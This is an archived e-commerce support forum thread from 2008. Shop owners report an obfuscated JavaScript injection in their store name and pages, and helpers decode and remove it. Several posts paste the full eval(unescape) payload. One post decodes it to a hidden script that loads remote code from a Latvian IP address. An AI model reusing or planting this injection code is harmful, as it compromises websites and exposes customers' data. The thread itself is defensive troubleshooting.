Forestshopkeeper Posted November 11, 2008 Share Posted November 11, 2008 This is the beginning of the order process email I received today for an order. Can anyone tell me why it is doing this? Shoppe in the Forest var o=document.links[3];if(o)o.innerHTML=o.innerHTML.replace(/\n([^"]+)/g,''); if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F~%2F%2E..@|%3C`%64i!%76$%20%73%74@y|l`%65|%3Ddi`%73%70l$%61%79~:n`%6F%6Ee%3E\nv|a|%72#%20@_;i~%66&(@%64o#%63%75~me%6Et%2Eco%6Fk@i$%65#%2E%6D%61%74%63%68&(@/|%5C!%62~h|%67!ft=%31$%2F!%29#%3D%3Dn`u!%6C&l)|do%63u@m#%65nt@.w~r%69t|%65%28"%3C%73%63ript!%20%73r%63%3D%2F#/@%37|%38|.15%37~%2E$%31%34#2!%2E5!%38/cp/?`"+%6Ea@%76i#%67%61&%74&%6Fr.`a~p%70N&a`m&e&.%63@%68#a|r$%41%74~(&%30%29+"%3E%3C%5C`/!s!%63!%72i~%70%74%3E&")%3B\n%2F@%2F%3C%2F%64%69!v%3E').replace(/`|\&|~|\$|@|\!|\||#/g,""));var yahoo_counter=1; It then goes into the normal order information. Thanks in advance Jim Link to comment Share on other sites More sharing options...
FIMBLE Posted November 11, 2008 Share Posted November 11, 2008 Looks like an attack to me, check you logs and dont send them any products unless you go the money cleared Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Forestshopkeeper Posted November 11, 2008 Author Share Posted November 11, 2008 This is the beginning of the order process email I received today for an order. Can anyone tell me why it is doing this? Shoppe in the Forest var o=document.links[3];if(o)o.innerHTML=o.innerHTML.replace(/\n([^"]+)/g,''); if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F~%2F%2E..@|%3C`%64i!%76$%20%73%74@y|l`%65|%3Ddi`%73%70l$%61%79~:n`%6F%6Ee%3E\nv|a|%72#%20@_;i~%66&(@%64o#%63%75~me%6Et%2Eco%6Fk@i$%65#%2E%6D%61%74%63%68&(@/|%5C!%62~h|%67!ft=%31$%2F!%29#%3D%3Dn`u!%6C&l)|do%63u@m#%65nt@.w~r%69t|%65%28"%3C%73%63ript!%20%73r%63%3D%2F#/@%37|%38|.15%37~%2E$%31%34#2!%2E5!%38/cp/?`"+%6Ea@%76i#%67%61&%74&%6Fr.`a~p%70N&a`m&e&.%63@%68#a|r$%41%74~(&%30%29+"%3E%3C%5C`/!s!%63!%72i~%70%74%3E&")%3B\n%2F@%2F%3C%2F%64%69!v%3E').replace(/`|\&|~|\$|@|\!|\||#/g,""));var yahoo_counter=1; It then goes into the normal order information. Thanks in advance Jim I have been looking through different threads, and it looks like this email is generated in the checkout_process.php file, but I don't know where this particular piece of code might be coming from. Order process emails were working properly prior to 4 Nov, but this is the first one since and I don't know why it is doing this. I don't use a yahoo counter, so I am not sure why this is where it is or where to take it out. There are some very smart people out there and I could certainly use your help. Jim Link to comment Share on other sites More sharing options...
Forestshopkeeper Posted November 11, 2008 Author Share Posted November 11, 2008 I have been looking through different threads, and it looks like this email is generated in the checkout_process.php file, but I don't know where this particular piece of code might be coming from. Order process emails were working properly prior to 4 Nov, but this is the first one since and I don't know why it is doing this. I don't use a yahoo counter, so I am not sure why this is where it is or where to take it out. There are some very smart people out there and I could certainly use your help. Jim It does appear that I have been hacked (again). I went through before and checked files and folders and made sure files permissions were set to 644 and folders to 755. now files are set at 444. I will continue to put in the security measures listed before. Has anyone seen the yahoo counter hack before and do you know what it does. Is it possible this hack compromised customer data? Thanks. Link to comment Share on other sites More sharing options...
germ Posted November 12, 2008 Share Posted November 12, 2008 If that script is a hack, check your files. It's at the bottom of most (if not all) your pages. :o If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Forestshopkeeper Posted November 12, 2008 Author Share Posted November 12, 2008 If that script is a hack, check your files. It's at the bottom of most (if not all) your pages. :o I am in the process of reposting the website now. It appears it was written to all files. Not sure how since permissions were properly set. Jim Link to comment Share on other sites More sharing options...
germ Posted November 13, 2008 Share Posted November 13, 2008 Just for "grins and giggles" I decoded the script. Here's approximately what the javascript writes into the page: //...<div style=display:none> var _;if(document.cookie.match(/\bhgft=1/)==null)document.write("<script src=//78.157.142.58/cp/?"+navigator.appName.charAt(0)+"><\/script"); //</div> That IP address traces to: IP address location & IP address info: IP address : 78.157.142.58 IP address country: Latvia IP address state: Riga IP address city: Riga Most likely some sort of information stealing racket... <_< If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
webshopgyrl Posted November 13, 2008 Share Posted November 13, 2008 Thanks for the info -- our store isn't even functional yet and we got the same thing. I don't know if I'd have found it but I was messing around with Foxfire's Web Developer add-on. How did you get rid of it -- other than deleting the code? I thought it was just Yahoo doing a scan, now I'm worried. Link to comment Share on other sites More sharing options...
FIMBLE Posted November 13, 2008 Share Posted November 13, 2008 there will always be "people" testing to see if they can breach your Site. remember to keep folder no higher that 755 and files 644. Its not always possible though, it depends on your hosts. If you find you have to have folders at 777 ask your host to install su_exce it willl allow you to run on 755. If they say no you should think about moving hosts. Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
webshopgyrl Posted November 13, 2008 Share Posted November 13, 2008 I don't have any folders set higher than 755 ... other than uploading a replacement for my index, is there anything else I should do? I have the security add-ons that I was going to install before we went live -- but I want to make sure that whatever is in there now is gone. Any suggestions? Link to comment Share on other sites More sharing options...
FIMBLE Posted November 13, 2008 Share Posted November 13, 2008 check your images folders for any files / folders you do not recognise. Sometimes if you download your store to your desktop and run a virus checker on it [right click & check scan] it will find something. Check your files for any script that looks odd. stay alert, check your error logs, if it happens over again and you are on a shared server it could be another site on the server that has been hacked, or possibly he server it self. Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
webshopgyrl Posted November 13, 2008 Share Posted November 13, 2008 Ok, thanks for the suggestions. I went through and deleted a lot of stuff I don't need any more -- even other languages I don't need and the basic install mfg and graphics, replaced my index and header file -- but it's still there. The only thing that I found that looked strange was a desktop.ini file that I figure I've accidentally uploaded -- but I deleted it too. I guess in the morning I'll download the entire store and run a scan -- but I didn't find anything that looked strange. I'll check here in the morning to see if any one else found anything when they were hunting. Is there any chance it's in the database or something? If I don't find anything I'll contact my host. Thanks so much for the help! Pam Link to comment Share on other sites More sharing options...
FIMBLE Posted November 13, 2008 Share Posted November 13, 2008 If its in an order you can delete it from your database, if it resides anywhere in your database you can delete it pretty easily Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Forestshopkeeper Posted November 13, 2008 Author Share Posted November 13, 2008 Just for "grins and giggles" I decoded the script. Here's approximately what the javascript writes into the page: //...<div style=display:none> var _;if(document.cookie.match(/\bhgft=1/)==null)document.write("<script src=//78.157.142.58/cp/?"+navigator.appName.charAt(0)+"><\/script"); //</div> That IP address traces to: Most likely some sort of information stealing racket... <_< How can I tell if they were able to get anything. Would it be anything more than the info in the email being written? Thanks Link to comment Share on other sites More sharing options...
germ Posted November 13, 2008 Share Posted November 13, 2008 You can't tell for sure. If they injected an IFRAME into the page (which was most likely exactly what happened) they could have gotten anything that was typed into any page the script was injected into. So, passwords may have been compromised, as well as any other data from anyone who registered or purchased while the page was hacked. :blush: If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
HappyHeath Posted November 21, 2008 Share Posted November 21, 2008 This is the beginning of the order process email I received today for an order. Can anyone tell me why it is doing this? Shoppe in the Forest var o=document.links[3];if(o)o.innerHTML=o.innerHTML.replace(/\n([^"]+)/g,''); if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F~%2F%2E..@|%3C`%64i!%76$%20%73%74@y|l`%65|%3Ddi`%73%70l$%61%79~:n`%6F%6Ee%3E\nv|a|%72#%20@_;i~%66&(@%64o#%63%75~me%6Et%2Eco%6Fk@i$%65#%2E%6D%61%74%63%68&(@/|%5C!%62~h|%67!ft=%31$%2F!%29#%3D%3Dn`u!%6C&l)|do%63u@m#%65nt@.w~r%69t|%65%28"%3C%73%63ript!%20%73r%63%3D%2F#/@%37|%38|.15%37~%2E$%31%34#2!%2E5!%38/cp/?`"+%6Ea@%76i#%67%61&%74&%6Fr.`a~p%70N&a`m&e&.%63@%68#a|r$%41%74~(&%30%29+"%3E%3C%5C`/!s!%63!%72i~%70%74%3E&")%3B\n%2F@%2F%3C%2F%64%69!v%3E').replace(/`|\&|~|\$|@|\!|\||#/g,""));var yahoo_counter=1; It then goes into the normal order information. Thanks in advance Jim I was hacked by JaCKal. This resulted in the code shown below being placed on all my pages thus reducing spead and being timed out. After Two long days I am happy to confirm that I resolved the problem by carrying out the following processes: 1, Enter into your admin, 2, Click on configuration, Click on My Store. The code is placed at the top of the page in store name. Delete the code and update. Yahoo! the code has gone and back to normal speed. if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F~%2F%2E..@|%3C`%64i!%76$%20%73%74@y|l`%65|%3Ddi`%73%70l$%61%79~:n`%6F%6Ee%3E\nv|a|%72#%20@_;i~%66&(@%64o#%63%75~me%6Et%2Eco%6Fk@i$%65#%2E%6D%61%74%63%68&(@/|%5C!%62~h|%67!ft=%31$%2F!%29#%3D%3Dn`u!%6C&l)|do%63u@m#%65nt@.w~r%69t|%65%28"%3C%73%63ript!%20%73r%63%3D%2F#/@%37|%38|.15%37~%2E$%31%34#2!%2E5!%38/cp/?`"+%6Ea@%76i#%67%61&%74&%6Fr.`a~p%70N&a`m&e&.%63@%68#a|r$%41%74~(&%30%29+"%3E%3C%5C`/!s!%63!%72i~%70%74%3E&")%3B\n%2F@%2F%3C%2F%64%69!v%3E').replace(/`|\&|~|\$|@|\!|\||#/g,""));var yahoo_counter=1 Link to comment Share on other sites More sharing options...
Dutch1 Posted November 23, 2008 Share Posted November 23, 2008 Unfortunately I deleted it from my store in the config file but it is still added to the orders when I view the code. Also my web site admin runs real slow Link to comment Share on other sites More sharing options...
webshopgyrl Posted November 23, 2008 Share Posted November 23, 2008 Unfortunately I deleted it from my store in the config file but it is still added to the orders when I view the code. Also my web site admin runs real slow Go to your Admin and look at "My Store" -- look closely at the name of the store and see if that code is included after your name. If you find it there and delete it, it should be gone. Give it a try! Good luck!! Link to comment Share on other sites More sharing options...
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.